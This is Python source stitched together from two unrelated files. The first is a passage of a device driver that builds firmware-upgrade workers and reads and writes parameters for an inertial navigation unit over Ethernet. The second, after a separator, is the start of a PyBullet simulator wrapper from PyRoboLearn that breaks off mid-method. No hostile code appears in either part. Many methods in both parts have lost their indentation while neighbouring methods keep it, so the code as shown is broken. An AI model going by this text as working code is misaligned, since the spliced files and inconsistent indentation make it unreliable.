        :return: a configured worker, or None (implicitly) for unknown
            rules.
        '''
        if rule == 'rtk':
            rtk_upgrade_worker = FirmwareUpgradeWorker(
                self.communicator,
                lambda: helper.format_firmware_content(content),
                self.ins_firmware_write_command_generator,
                192)
            rtk_upgrade_worker.name = 'MAIN_RTK'
            # the device needs time (flash erase) after the first packet
            rtk_upgrade_worker.on(
                UPGRADE_EVENT.FIRST_PACKET, lambda: time.sleep(15))
            rtk_upgrade_worker.on(UPGRADE_EVENT.BEFORE_WRITE,
                                  lambda: self.before_write_content('0', len(content)))
            return rtk_upgrade_worker
        if rule == 'ins':
            ins_upgrade_worker = FirmwareUpgradeWorker(
                self.communicator,
                lambda: helper.format_firmware_content(content),
                self.ins_firmware_write_command_generator,
                192)
            # NOTE(review): shares the 'MAIN_RTK' name with the rtk
            # worker, so get_upgrade_workers brackets both inside one
            # jump-bootloader/jump-application pair — confirm intended
            ins_upgrade_worker.name = 'MAIN_RTK'
            ins_upgrade_worker.group = UPGRADE_GROUP.FIRMWARE
            ins_upgrade_worker.on(
                UPGRADE_EVENT.FIRST_PACKET, lambda: time.sleep(15))
            ins_upgrade_worker.on(UPGRADE_EVENT.BEFORE_WRITE,
                                  lambda: self.before_write_content('1', len(content)))
            return ins_upgrade_worker
        if rule == 'sdk':
            sdk_upgrade_worker = EthernetSDK9100UpgradeWorker(
                self.communicator,
                lambda: helper.format_firmware_content(content))
            sdk_upgrade_worker.group = UPGRADE_GROUP.FIRMWARE
            return sdk_upgrade_worker
        if rule == 'imu':
            imu_upgrade_worker = FirmwareUpgradeWorker(
                self.communicator,
                lambda: helper.format_firmware_content(content),
                self.imu_firmware_write_command_generator,
                192)
            imu_upgrade_worker.name = 'SUB_IMU'
            imu_upgrade_worker.group = UPGRADE_GROUP.FIRMWARE
            imu_upgrade_worker.on(
                UPGRADE_EVENT.FIRST_PACKET, lambda: time.sleep(8))
            return imu_upgrade_worker
    def get_upgrade_workers(self, firmware_content):
        '''Split a combined firmware image into per-target sections and
        build the ordered worker list for the upgrade center.

        rtk/ins sections ('MAIN_RTK' workers) are bracketed by an INS
        jump-bootloader/jump-application pair; the imu section
        ('SUB_IMU') by the equivalent IMU pair.
        '''
        workers = []
        rules = [
            InternalCombineAppParseRule('rtk', 'rtk_start:', 4),
            InternalCombineAppParseRule('ins', 'ins_start:', 4),
            InternalCombineAppParseRule('sdk', 'sdk_start:', 4),
            InternalCombineAppParseRule('imu', 'imu_start:', 4),
        ]
        if self.communicator:
            self.communicator.reset_buffer()
            self.communicator.upgrade()
        parsed_content = firmware_content_parser(firmware_content, rules)
        # foreach parsed content, if empty, skip register into upgrade center
        for _, rule in enumerate(parsed_content):
            content = parsed_content[rule]
            if len(content) == 0:
                continue
            worker = self.build_worker(rule, content)
            if not worker:
                continue
            workers.append(worker)
        # wrap ins bootloader: locate the span of MAIN_RTK workers
        start_index = -1
        end_index = -1
        for i, worker in enumerate(workers):
            if isinstance(worker, FirmwareUpgradeWorker) and worker.name == 'MAIN_RTK':
                start_index = i if start_index == -1 else start_index
                end_index = i
        # a unit already in bootloader answers the jump faster
        if self.is_in_bootloader:
            ins_wait_timeout = 1
        else:
            ins_wait_timeout = 3
        ins_jump_bootloader_worker = JumpBootloaderWorker(
            self.communicator,
            command=self.ins_jump_bootloader_command_generator,
            listen_packet=[0x01, 0xaa],
            wait_timeout_after_command=ins_wait_timeout)
        ins_jump_bootloader_worker.group = UPGRADE_GROUP.FIRMWARE
        ins_jump_bootloader_worker.on(
            UPGRADE_EVENT.AFTER_COMMAND, self.do_reshake)
        ins_jump_application_worker = JumpApplicationWorker(
            self.communicator,
            command=self.ins_jump_application_command_generator,
            listen_packet=[0x02, 0xaa],
            wait_timeout_after_command=4)
        ins_jump_application_worker.group = UPGRADE_GROUP.FIRMWARE
        ins_jump_application_worker.on(
            UPGRADE_EVENT.AFTER_COMMAND, self.do_reshake)
        if start_index > -1 and end_index > -1:
            # end_index+2 accounts for the bootloader worker inserted
            # in front of the span
            workers.insert(
                start_index, ins_jump_bootloader_worker)
            workers.insert(
                end_index+2, ins_jump_application_worker)
        # wrap imu bootloader: same bracketing for the SUB_IMU worker
        start_index = -1
        end_index = -1
        for i, worker in enumerate(workers):
            if isinstance(worker, FirmwareUpgradeWorker) and worker.name == 'SUB_IMU':
                start_index = i if start_index == -1 else start_index
                end_index = i
        imu_jump_bootloader_worker = JumpBootloaderWorker(
            self.communicator,
            command=self.imu_jump_bootloader_command_generator,
            listen_packet=[0x4a, 0x49],
            wait_timeout_after_command=5)
        imu_jump_bootloader_worker.on(
            UPGRADE_EVENT.BEFORE_COMMAND, self.do_reshake)
        imu_jump_bootloader_worker.group = UPGRADE_GROUP.FIRMWARE
        imu_jump_application_worker = JumpApplicationWorker(
            self.communicator,
            command=self.imu_jump_application_command_generator,
            listen_packet=[0x4a, 0x41])
        imu_jump_application_worker.group = UPGRADE_GROUP.FIRMWARE
        if start_index > -1 and end_index > -1:
            workers.insert(
                start_index, imu_jump_bootloader_worker)
            workers.insert(
                end_index+2, imu_jump_application_worker)
        return workers
def get_device_connection_info(self):
return {
'modelName': self.device_info['name'],
'deviceType': self.type,
'serialNumber': self.device_info['sn'],
'partNumber': self.device_info['pn'],
'firmware': self.device_info['firmware_version']
}
def get_operation_status(self):
if self.is_logging:
return 'LOGGING'
return 'IDLE'
    def check_predefined_result(self):
        '''Verify that predefined parameters were stored by the device.

        Reads all parameters back, dumps them to a timestamped JSON file
        in the session folder, then compares each value against the
        predefined set and prints a green/yellow summary.
        '''
        local_time = time.localtime()
        formatted_file_time = time.strftime("%Y_%m_%d_%H_%M_%S", local_time)
        file_path = os.path.join(
            self.rtk_log_file_name,
            'parameters_predefined_{0}.json'.format(formatted_file_time))
        # save parameters to data log folder after predefined parameters setup
        result = self.get_params()
        if result['packetType'] == 'inputParams':
            with open(file_path, 'w') as outfile:
                json.dump(result['data'], outfile, indent=4, ensure_ascii=False)
            # compare saved parameters with predefined parameters,
            # keyed by paramId
            hashed_predefined_parameters = helper.collection_to_dict(
                self.properties["initial"]["userParameters"], key='paramId')
            hashed_current_parameters = helper.collection_to_dict(result['data'],
                                                                  key='paramId')
            success_count = 0
            fail_count = 0
            fail_parameters = []
            for key in hashed_predefined_parameters:
                #print(hashed_current_parameters[key]['name'], 'current:',hashed_current_parameters[key]['value'],'predefined:',hashed_predefined_parameters[key]['value'])
                if hashed_current_parameters[key]['value'] == \
                        hashed_predefined_parameters[key]['value']:
                    success_count += 1
                else:
                    fail_count += 1
                    fail_parameters.append(
                        hashed_predefined_parameters[key]['name'])
            check_result = 'Predefined Parameters are saved. Success ({0}), Fail ({1})'.format(
                success_count, fail_count)
            # the two branches are mutually exclusive in practice:
            # all-success prints green, any failure prints yellow
            if success_count == len(hashed_predefined_parameters.keys()):
                print_green(check_result)
            if fail_count > 0:
                print_yellow(check_result)
                print_yellow('The failed parameters: {0}'.format(fail_parameters))
    def save_device_info(self):
        ''' Save device configuration
            File name: configuration.json

        Appends one session record (timestamp, device/app info, and all
        current parameter values) to configuration.json in the session
        log folder. No-op before the session folder exists or while in
        bootloader mode.
        '''
        if not self.rtk_log_file_name or not self._device_info_string:
            return
        if self.is_in_bootloader:
            return
        result = self.get_params()
        device_configuration = None
        file_path = os.path.join(self.rtk_log_file_name, 'configuration.json')
        # the file accumulates a list of session records
        if not os.path.exists(file_path):
            device_configuration = []
        else:
            with open(file_path) as json_data:
                device_configuration = (list)(json.load(json_data))
        if result['packetType'] == 'inputParams':
            session_info = dict()
            session_info['time'] = time.strftime("%Y-%m-%d %H:%M:%S",
                                                 time.localtime())
            session_info['device'] = self.device_info
            session_info['app'] = self.app_info
            if self.cli_options.debug == 'true':
                session_info['compile'] = self.compile_info
            session_info['interface'] = self.cli_options.interface
            # flatten the parameter list into a name -> value mapping
            parameters_configuration = dict()
            for item in result['data']:
                param_name = item['name']
                param_value = item['value']
                parameters_configuration[param_name] = param_value
            session_info['parameters'] = parameters_configuration
            device_configuration.append(session_info)
            with open(file_path, 'w') as outfile:
                json.dump(device_configuration,
                          outfile,
                          indent=4,
                          ensure_ascii=False)
    def after_upgrade_completed(self):
        '''Hook invoked when a firmware upgrade finishes; no-op here.'''
        pass
# command list
def server_status(self, *args): # pylint: disable=invalid-name
'''
Get server connection status
'''
return {'packetType': 'ping', 'data': {'status': '1'}}
def get_device_info(self, *args): # pylint: disable=invalid-name
'''
Get device information
'''
return {
'packetType':
'deviceInfo',
'data': [{
'name': 'Product Name',
'value': self.device_info['name']
}, {
'name': 'IMU',
'value': self.device_info['imu']
}, {
'name': 'PN',
'value': self.device_info['pn']
}, {
'name': 'Firmware Version',
'value': self.device_info['firmware_version']
}, {
'name': 'SN',
'value': self.device_info['sn']
}, {
'name': 'App Version',
'value': self.app_info['version']
}]
}
def get_log_info(self):
'''
Build information for log
'''
return {
"type": self.type,
"model": self.device_info['name'],
"logInfo": {
"pn": self.device_info['pn'],
"sn": self.device_info['sn'],
"rtkProperties": json.dumps(self.properties)
}
}
def get_conf(self, *args): # pylint: disable=unused-argument
'''
Get json configuration
'''
return {
'packetType': 'conf',
'data': {
'outputs': self.properties['userMessages']['outputPackets'],
'inputParams': self.properties['userConfiguration']
}
}
    @with_device_message
    def get_params(self, *args):  # pylint: disable=unused-argument
        '''
        Get all parameters.

        Generator driven by the with_device_message decorator: queries
        each configured parameter from the device one by one and yields
        the collected list, or an error as soon as one query fails.
        '''
        has_error = False
        parameter_values = []
        for parameter in self.properties['userConfiguration']:
            # paramId 0 is a placeholder entry, not a device parameter
            if parameter['paramId'] == 0:
                continue
            result = self.get_param(parameter)
            if result['packetType'] == 'error':
                has_error = True
                break
            parameter_values.append(result['data'])
            # pace the requests so the device can keep up
            time.sleep(0.3)
        if not has_error:
            self.parameters = parameter_values
            yield {'packetType': 'inputParams', 'data': parameter_values}
        yield {'packetType': 'error', 'data': 'No Response'}
    @with_device_message
    def get_param(self, params, *args):  # pylint: disable=unused-argument
        '''
        Get a single parameter value (command 0x02 0xcc).

        :param params: dict with at least 'paramId'.
        Yields an 'inputParam' packet on success, 'error' otherwise;
        the with_device_message decorator drives this generator.
        '''
        gP = b'\x02\xcc'
        message_bytes = []
        message_bytes.extend(encode_value('uint32', params['paramId']))
        command_line = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
            gP, message_bytes)
        result = yield self._message_center.build(command=command_line.actual_command)
        data = result['data']
        error = result['error']
        if error:
            yield {'packetType': 'error', 'data': 'No Response'}
        if data:
            self.parameters = data
            yield {'packetType': 'inputParam', 'data': data}
        yield {'packetType': 'error', 'data': 'No Response'}
    @with_device_message
    def set_params(self, params, *args):  # pylint: disable=unused-argument
        '''
        Update parameters value.

        Pushes each parameter whose paramId exists in the configured
        userConfiguration (borrowing its declared type); stops at the
        first failure. Driven by the with_device_message decorator.
        '''
        input_parameters = self.properties['userConfiguration']
        for parameter in params:
            exist_parameter = next((x for x in input_parameters
                                    if x['paramId'] == parameter['paramId']),
                                   None)
            if exist_parameter:
                parameter['type'] = exist_parameter['type']
                result = self.set_param(parameter)
                # print('result:', result)
                packet_type = result['packetType']
                data = result['data']
                if packet_type == 'error':
                    yield {'packetType': 'error', 'data': {'error': data}}
                    break
                # a non-zero device error code also aborts the batch
                if data['error'] > 0:
                    yield {'packetType': 'error', 'data': {'error': data}}
                    break
                time.sleep(0.1)
        yield {'packetType': 'success', 'data': {'error': 0}}
    @with_device_message
    def set_param(self, params, *args):  # pylint: disable=unused-argument
        '''
        Update a single parameter value (command 0x03 0xcc).

        :param params: dict with 'paramId', 'type' and 'value'.
        Driven by the with_device_message decorator.
        '''
        uP = b'\x03\xcc'
        message_bytes = []
        message_bytes.extend(encode_value('uint32', params['paramId']))
        message_bytes.extend(encode_value(params['type'], params['value']))
        command_line = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
            uP, message_bytes)
        result = yield self._message_center.build(command=command_line.actual_command)
        error = result['error']
        data = result['data']
        if error:
            yield {'packetType': 'error', 'data': {'error': data}}
        yield {'packetType': 'success', 'data': {'error': data}}
    @with_device_message
    def save_config(self, *args):  # pylint: disable=unused-argument
        '''
        Save configuration to the device (command 0x04 0xcc).

        Driven by the with_device_message decorator.
        '''
        sC = b'\x04\xcc'
        command_line = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
            sC)
        # self.communicator.write(command_line)
        # result = self.get_input_result('sC', timeout=2)
        result = yield self._message_center.build(command=command_line.actual_command,
                                                  timeout=2)
        data = result['data']
        error = result['error']
        if error:
            yield {'packetType': 'error', 'data': data}
        yield {'packetType': 'success', 'data': data}
    @with_device_message
    def set_mount_angle(self, *args):  # pylint: disable=unused-argument
        '''
        Send the set-mount-angle command (0x05 0xcc).

        Driven by the with_device_message decorator.
        '''
        sC = b'\x05\xcc'
        command_line = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
            sC)
        result = yield self._message_center.build(command=command_line.actual_command,
                                                  timeout=2)
        data = result['data']
        error = result['error']
        print('set mount angle result:', data)
        if error:
            yield {'packetType': 'error', 'data': data}
        yield {'packetType': 'success', 'data': data}
    @with_device_message
    def get_ins_message(self):
        '''Query the saved INS message (command 0x09 0x0a).

        Yields both the decoded data and the raw frame so the caller
        can archive it; driven by the with_device_message decorator.
        '''
        command_gi = b'\x09\x0a'
        command_line = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
            command_gi)
        result = yield self._message_center.build(command=command_line.actual_command, timeout=3)
        error = result['error']
        data = result['data']
        raw_data = result['raw']
        if error:
            yield {'packetType': 'error', 'data': {'error': error}, 'raw_data': {'error': error}}
        yield {'packetType': 'success', 'data': data, 'raw_data': raw_data}
    @with_device_message
    def get_compile_message(self):
        '''Query the firmware compile information (command 0x09 0xaa).

        Yields both the decoded data and the raw frame; driven by the
        with_device_message decorator.
        '''
        command_gc = b'\x09\xaa'
        command_line = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
            command_gc)
        result = yield self._message_center.build(command=command_line.actual_command, timeout=3)
        error = result['error']
        data = result['data']
        raw_data = result['raw']
        if error:
            yield {'packetType': 'error', 'data': {'error': error}, 'raw_data': {'error': error}}
        yield {'packetType': 'success', 'data': data, 'raw_data': raw_data}
@with_device_message
def reset_params(self, params, *args): # pylint: disable=unused-argument
'''
Reset params to default
'''
raise Exception('Not implemented')
    def upgrade_framework(self, params, *args):  # pylint: disable=unused-argument
        '''
        Upgrade framework.

        :param params: firmware file path, either as a plain string or
            as a dict carrying a 'file' key.
        :return: {'packetType': 'success'} once the upgrade thread has
            been kicked off (or if one is already running).
        '''
        file = ''
        if isinstance(params, str):
            file = params
        if isinstance(params, dict):
            file = params['file']
        # start a thread to do upgrade
        if not self.is_upgrading:
            self.is_upgrading = True
            # quiesce normal traffic and logging while flashing
            self._message_center.pause()
            if self._logger is not None:
                self._logger.stop_user_log()
            self.thread_do_upgrade_framework(file)
            print("Upgrade INS401 firmware started at:[{0}].".format(
                datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
        return {'packetType': 'success'}
    @with_device_message
    def send_command(self, command_line):
        '''Send a prebuilt command and wait (5s) for its response.

        :param command_line: raw command bytes to transmit.
        Driven by the with_device_message decorator.
        '''
        # command_line = #build a command
        # helper.build_input_packet('rD')
        result = yield self._message_center.build(command=command_line,
                                                  timeout=5)
        error = result['error']
        data = result['data']
        if error:
            yield {'packetType': 'error', 'data': {'error': error}}
        yield {'packetType': 'success', 'data': data}
def prepare_lib_folder(self):
executor_path = resource.get_executor_path()
lib_folder_name = 'libs'
# copy contents of libs file under executor path
lib_folder_path = os.path.join(
executor_path, lib_folder_name)
if not os.path.isdir(lib_folder_path):
os.makedirs(lib_folder_path)
DR_lib_file = "DR_MountAngle"
INS_lib_file = "INS"
if os.name == 'nt': # windows
DR_lib_file = "DR_MountAngle.dll"
INS_lib_file = "INS.dll"
DR_lib_path = os.path.join(lib_folder_path, DR_lib_file)
if not os.path.isfile(DR_lib_path):
lib_content = resource.get_content_from_bundle(
lib_folder_name, DR_lib_file)
if lib_content is None:
raise ValueError('Lib file content is empty')
with open(DR_lib_path, "wb") as code:
code.write(lib_content)
INS_lib_path = os.path.join(lib_folder_path, INS_lib_file)
if not os.path.isfile(INS_lib_path):
lib_content = resource.get_content_from_bundle(
lib_folder_name, INS_lib_file)
if lib_content is None:
raise ValueError('Lib file content is empty')
with open(INS_lib_path, "wb") as code:
code.write(lib_content)
if DR_lib_path and INS_lib_path:
return True
return False
|
bullet.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Define the Bullet Simulator API.
This is the main interface that communicates with the PyBullet simulator [1]. By defining this interface, it allows to
decouple the PyRoboLearn framework from the simulator. It also converts some data types to the ones required by
PyBullet. For instance, some methods in PyBullet do not accept numpy arrays but only lists. The interface provided
here makes the necessary conversions.
The signature of each method defined here are inspired by [1,2] but in accordance with the PEP8 style guide [3].
Parts of the documentation for the methods have been copied-pasted from [2] for completeness purposes.
- Supported Python versions: Python 2.7 and 3.*
- Python wrappers: manually written by Erwin Coumans (see
https://github.com/bulletphysics/bullet3/blob/master/examples/pybullet/pybullet.c)
Dependencies in PRL:
* `pyrobolearn.simulators.simulator.Simulator`
References:
- [1] PyBullet: https://pybullet.org
- [2] PyBullet Quickstart Guide: https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA
- [3] PEP8: https://www.python.org/dev/peps/pep-0008/
"""
# general imports
import os
# import inspect
import time
import numpy as np
# import pybullet
import pybullet
import pybullet_data
# from pybullet_envs.bullet.bullet_client import BulletClient
from pybullet_utils.bullet_client import BulletClient
# import PRL simulator
from pyrobolearn.simulators.simulator import Simulator
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2018, PyRoboLearn"
__credits__ = ["Bullet (Erwin Coumans and Yunfei Bai)", "Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class Bullet(Simulator):
r"""PyBullet simulator.
This is a wrapper around the PyBullet API [1]. For many methods, it is just the same as calling directly the
original methods. However for several ones, it converts the data into the correct data type.
For instance, some methods in PyBullet returns a matrix :math:`NxM` in a list format with length :math:`NxM`,
instead of a numpy array. Other data types includes vectors, quaternions, and others which are all returned as
list. The problem with this approach is that we first have to convert the data in our code in order to operate
on it. A converter can be specified which converts into the desired format. If none, it will convert the data
into numpy arrays instead of lists.
Also, this wrapper enforces consistency. For instance, all the given and produced angles are represented in
radians, and not in degrees. Some original `pybullet` methods require angles expressed in radians, and others in
degrees.
The class also presents the documentation of each method which relieve us to check the user guide [1].
Most of the documentation has been copied-pasted from [1], written by Erwin Coumans and Yunfei Bai.
Also, Some extra methods have been defined.
Finally, note that this API is incompatible with the original `pybullet`, i.e. it is not interchangeable in the
code! In addition, using this interface allows us to easily switch with other `Simulator` APIs, and make it more
modular if the signature of the original PyBullet library change.
In the following documentation:
* `vec3` specifies a list/tuple/np.array of 3 floats
* `quat` specifies a list/tuple/np.array of 4 floats
Examples:
sim = Bullet()
References:
- [1] "PyBullet, a Python module for physics simulation for games, robotics and machine learning", Erwin
Coumans and Yunfei Bai, 2016-2019
- [2] PyBullet Quickstart Guide: https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA
Erwin Coumans and Yunfei Bai, 2017/2018
"""
    def __init__(self, render=True, num_instances=1, middleware=None, **kwargs):
        """
        Initialize the PyBullet simulator.

        Connects to a fresh PyBullet server (GUI or DIRECT depending on `render`), registers the
        `pybullet_data` search path, initializes the command/id history containers, and enables the
        default gravity.

        Args:
            render (bool): if True, it will open the GUI, otherwise, it will just run the server.
            num_instances (int): number of simulator instances.
            middleware (MiddleWare, None): middleware instance.
            **kwargs (dict): optional arguments (this is not used here).
        """
        # try to import the pybullet library
        # normally that should be done outside the class but because it might have some conflicts with other libraries
        # import pybullet
        # import pybullet_data
        # from pybullet_envs.bullet.bullet_client import BulletClient

        # initialize the parent Simulator (stores render / num_instances / middleware flags)
        super(Bullet, self).__init__(render=render, num_instances=num_instances, middleware=middleware, **kwargs)

        # parse the kwargs

        # Connect to pybullet: the connection mode must be chosen before creating the client,
        # it cannot be changed afterwards without reconnecting (see `__init` and `render`).
        if render:  # GUI
            self.connection_mode = pybullet.GUI
            self.sim = BulletClient(connection_mode=self.connection_mode)
            # hide the side panels of the GUI; only the 3D view remains visible
            self.sim.configureDebugVisualizer(self.sim.COV_ENABLE_GUI, 0)
        else:  # without GUI
            self.connection_mode = pybullet.DIRECT
            self.sim = BulletClient(connection_mode=self.connection_mode)

        # set simulator ID (the physics-server client id assigned by pybullet)
        self.id = self.sim._client

        # add additional search path when loading URDFs, SDFs, MJCFs, etc.
        self.sim.setAdditionalSearchPath(pybullet_data.getDataPath())
        # TODO: add gazebo_models path

        # create history container that keeps track of what we created in the simulator (including collision and visual
        # shapes, bodies, URDFs, SDFs, MJCFs, etc), the textures we applied, the constraints we created, the dynamical
        # properties we changed, etc. This is useful when we need to create an other instance of the simulator,
        # or when we need to change the connection type (by rendering or hiding the GUI).
        # The items in the history container are in the same order there were called. Each item is a tuple where the
        # first item is the name of the method called, and the second item is the parameters that were passed to that
        # method.
        self.history = []  # keep track of every commands
        self.ids = []  # keep track of created unique ids

        # main camera in the simulator (set lazily, e.g. by `render` before hiding the GUI)
        self._camera = None

        # given parameters
        # NOTE(review): only `render` and the extra kwargs are saved here; `num_instances` and
        # `middleware` are not — confirm whether they should be recorded as well.
        self.kwargs = {'render': render, 'kwargs': kwargs}

        # define default timestep (PyBullet's default stepping rate is 240 Hz)
        self.default_timestep = 1. / 240
        self.dt = self.default_timestep

        # by default, set gravity (uses `set_gravity`'s default of (0, 0, -9.81))
        self.set_gravity()

        # go through the global variables / attributes defined in pybullet and set them here
        # this includes for instance: JOINT_REVOLUTE, POSITION_CONTROL, etc.
        # for attribute in dir(pybullet):
        #     if attribute[0].isupper():  # any global variable starts with a capital letter
        #         setattr(self, attribute, getattr(pybullet, attribute))
# def __del__(self):
# """Clean up connection if not already done.
#
# Copied-pasted from `pybullet_envs/bullet/bullet_client.py`.
# """
# try:
# pybullet.disconnect(physicsClientId=self._client)
# except pybullet.error:
# pass
#
# def __getattr__(self, name):
# """Inject the client id into Bullet functions.
#
# Copied-pasted from `pybullet_envs/bullet/bullet_client.py`.
# """
# attribute = getattr(pybullet, name)
# if inspect.isbuiltin(attribute):
# attribute = functools.partial(attribute, physicsClientId=self._client)
# return attribute
##############
# Properties #
##############
@property
def version(self):
"""Return the version of the simulator in a year-month-day format."""
return self.sim.getAPIVersion()
@property
def timestep(self):
"""Return the simulator time step."""
return self.dt
#############
# Operators #
#############
def __copy__(self):
"""Return a shallow copy of the Bullet simulator.
Warnings:
- this returns a simulator in the DIRECT mode. PyBullet does not allow to have several instances of the
simulator in the GUI mode in the same process.
- this method does not copy the dynamic properties or load the 3D models in the returned simulator.
Returns:
Bullet: new simulator instance.
"""
return Bullet(render=False)
def __deepcopy__(self, memo={}):
"""Return a deep copy of the Bullet simulator.
Warnings:
- this returns a simulator in the DIRECT mode. PyBullet does not allow to have several instances of the
simulator in the GUI mode in the same process.
- this method does not change the connection mode of the simulator, this has to be done outside the method
because it could otherwise cause different errors (e.g. when using multiprocessing).
Args:
memo (dict): dictionary containing references about already instantiated objects and allowing to share
information. Notably, it can contain the following keys `copy_models` (bool) which specifies if we
should load the models that have been loaded into the simulator (by default, it is False), and
`copy_properties` which specifies if we should copy the dynamic properties that has been set such as
gravity, friction coefficients, and others (by default, it is False).
Returns:
Bullet: bullet simulator in DIRECT mode.
"""
# if the object has already been copied return the reference to the copied object
if self in memo:
return memo[self]
# check if the memo has arguments that specify how to deep copy the simulator
copy_models = memo.get('copy_parameters', False)
copy_properties = memo.get('copy_properties', False)
# create new bullet simulator
sim = Bullet(render=False)
# load the models in the new simulator if specified
if copy_models:
pass
# copy the properties in the new simulator if specified
if copy_properties:
pass
# update the memodict
memo[self] = sim
return sim
##################
# Static methods #
##################
@staticmethod
def simulate_soft_bodies():
"""Return True if the simulator can simulate soft bodies."""
# For the moment, this feature is not well supported in PyBullet
# You can check Jan Matas's work for soft bodies:
# - https://github.com/JanMatas/bullet3
# - https://www.imperial.ac.uk/media/imperial-college/faculty-of-engineering/computing/public/1718-ug-projects\
# /Jan-Matas-Learning-end-to-end-robotic-manipulation-of-deformable-objects.pdf
return False
@staticmethod
def supports_dynamic_loading():
"""Return True if the simulator supports the dynamic loading of models."""
return True
###########
# Methods #
###########
##############
# Simulators #
##############
# @staticmethod
# def copy(other, copy_models=True, copy_properties=True):
# """Create another simulator.
#
# Args:
# other (Bullet): the other simulator.
# copy_models (bool): if True, it will load the various 3d models in the simulator.
# copy_properties (bool): if True, it will copy the physical properties (gravity, friction, etc).
# """
# # create another simulator
# if not isinstance(other, Bullet):
# raise TypeError("Expecting the given 'other' simulator to be an instance of `Bullet`, instead got: "
# "{}".format(type(other)))
# sim = Bullet(render=(other.connection_mode == pybullet.GUI))
#
# # load the models if specified
# if copy_models:
# for item in other.history:
# if item[0] == 'visual':
# sim.create_visual_shape(**item[1])
# elif item[0] == 'collision':
# sim.create_collision_shape(**item[1])
# elif item[0] == 'body':
# sim.create_body(**item[1])
# elif item[0] == 'urdf':
# sim.load_urdf(**item[1])
# elif item[0] == 'sdf':
# sim.load_sdf(**item[1])
# elif item[0] == 'mjcf':
# sim.load_mjcf(**item[1])
# elif item[0] == 'texture':
# sim.load_texture(**item[1])
# else:
# pass
#
# return sim
    def __init(self, connection_mode):
        """Initialize the simulator with the specified connection mode.

        Closes the current physics server (if any), reconnects with the given mode, and then
        replays every recorded command from `self.history` to rebuild the world in the new
        server. Note: the double leading underscore makes this name-mangled (private).

        Args:
            connection_mode (int): pybullet connection mode (e.g. pybullet.GUI, pybullet.DIRECT).
        """
        # close the previous simulator
        # NOTE(review): `close` deletes `self.sim`, so this attribute access assumes `close`
        # has not been called beforehand — confirm intended lifecycle.
        if self.sim is not None:
            self.close()
        # initialize the simulator (create it, set its id, and set the path to the models)
        # self.sim.connect(connection_mode)
        self.sim = BulletClient(connection_mode=connection_mode)
        self.id = self.sim._client
        self.sim.setAdditionalSearchPath(pybullet_data.getDataPath())
        # execute each method in the history; the list is snapshotted and cleared first so the
        # replayed calls can re-append themselves without being processed twice
        history = list(self.history)
        self.history = []
        for item in history:
            # item is a (method_name, kwargs_dict) pair recorded by the original call
            method = getattr(self, item[0])
            method(**item[1])
def reset(self):
"""Reset the simulator.
"It will remove all objects from the world and reset the world to initial conditions." [1]
"""
self.sim.resetSimulation()
    def close(self):
        """Close the simulator.

        Deletes the `BulletClient` reference; presumably the client's own destructor then
        disconnects from the physics server — TODO confirm against `pybullet_utils.bullet_client`.
        NOTE(review): after this call `self.sim` no longer exists as an attribute, so any later
        access (e.g. in `__init`) would raise AttributeError — verify callers.
        """
        del self.sim
        # try:
        #     self.sim.disconnect(physicsClientId=self.id)
        # except pybullet.error:
        #     pass
def step(self, sleep_time=0.):
"""Perform a step in the simulator, and sleep the specified amount of time.
"stepSimulation will perform all the actions in a single forward dynamics simulation step such as collision
detection, constraint solving and integration. The default timestep is 1/240 second, it can be changed using
the setTimeStep or setPhysicsEngineParameter API." [1]
Args:
sleep_time (float): amount of time to sleep after performing one step in the simulation.
"""
self.sim.stepSimulation()
time.sleep(sleep_time)
def reset_scene_camera(self, camera=None):
"""
Reinitialize/Reset the scene view camera to the previous one.
Args:
camera (tuple of 3 float and a 3d np.array): tuple containing the (yaw, pitch, distance, target_position).
The yaw and pitch angles are expressed in radians, the distance in meter, and the target position is
a 3D vector.
"""
if camera is None:
camera = self._camera if self._camera is not None else self.get_debug_visualizer()[-4:]
yaw, pitch, distance, target = camera
self.reset_debug_visualizer(distance=distance, yaw=yaw, pitch=pitch, target_position=target)
    def render(self, enable=True, mode='human'):
        """Render the GUI.

        Warnings: note that this operation can be time consuming with the pybullet simulator if we need to change the
        connection type. This is because we need to close the previous simulator, create a new one with the new
        connection type, and reload everything into that new simulator. I would not advise to use it frequently in the
        'human' mode. If the 'rgb' mode is used, you have to call this method frequently to get a new picture, however
        do not call at a high frequency rate (depending on the picture size).

        Args:
            enable (bool): If True, it will render the simulator by enabling the GUI.
            mode (str): specify the rendering mode. If mode=='human', it will render it in the simulator, if
                mode=='rgb', it will return a picture taken with the main camera of the simulator.

        Returns:
            if mode == 'human':
                None
            if mode == 'rgb':
                np.array[W,H,D]: RGB image
        """
        if not self._render:  # currently not rendering
            if enable:
                if mode == 'human':
                    # self.sim.configureDebugVisualizer(self.sim.COV_ENABLE_RENDERING, 1)
                    # switching DIRECT -> GUI requires a full reconnect: save the world state,
                    # reconnect, then restore the state in the new server
                    if self.connection_mode == pybullet.DIRECT:
                        # save the state of the simulator
                        filename = 'PYROBOLEARN_RENDERING_STATE.bullet'
                        self.save(filename=filename)

                        # change the connection mode (reconnects and replays the history)
                        self.connection_mode = pybullet.GUI
                        self.__init(self.connection_mode)

                        # load the state of the world in the simulator, then drop the temp file
                        self.load(filename)
                        os.remove(filename)

                        # reset the camera to the previously cached configuration (if any)
                        self.reset_scene_camera(camera=self._camera)
                elif mode == 'rgb' or mode == 'rgba':
                    # off-screen rendering: take a picture with the debug visualizer camera
                    width, height, view_matrix, projection_matrix = self.get_debug_visualizer()[:4]
                    img = np.asarray(self.get_camera_image(width, height, view_matrix, projection_matrix)[2])
                    img = img.reshape(width, height, 4)  # RGBA
                    if mode == 'rgb':
